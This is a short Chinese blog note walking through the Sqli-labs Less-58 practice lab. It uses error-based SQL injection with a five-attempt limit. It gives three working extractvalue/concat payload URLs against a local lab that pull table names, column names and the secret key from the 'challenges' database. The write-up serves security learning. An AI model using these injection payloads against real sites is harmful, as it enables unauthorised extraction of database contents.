Sqli-labs Less-58 報錯注入 5次機會

2020 年 4 月 9 日
筆記

執行sql語句後，並沒有返回資料庫當中的數據，所以我們這裡不能使用union聯合注入，這裡使用報錯注入。但是需要注意這裡只有5次機會嘗試。

找表名

http://127.0.0.1/sql/Less-58/?id=-1′ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))–+

找列名

http://127.0.0.1/sql/Less-58/?id=-1′ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’challenges’ and table_name=’dzgnt6f0xz’),0x7e))–+

找key

http://127.0.0.1/sql/Less-58/?id=-1′ and extractvalue(1,concat(0x7e,(select group_concat(secret_GYDQ) from dzgnt6f0xz),0x7e))–+

Sqli-labs Less-58 報錯注入 5次機會

VirMach 便宜 VPS

QNews

Sqli-labs Less-58 報錯注入 5次機會

分享此文：

Related Posts

hdfs學習(三)

if __name__ == '__main__': 到底是個啥？

位運算使用技巧及巧解演算法題

人工智慧新手入門學習路線和學習資源合集（含AI綜述/python/機器學習/深度學習/tensorflow）

VirMach 便宜 VPS

QNews

熱門搜尋

if name == 'main': 到底是個啥？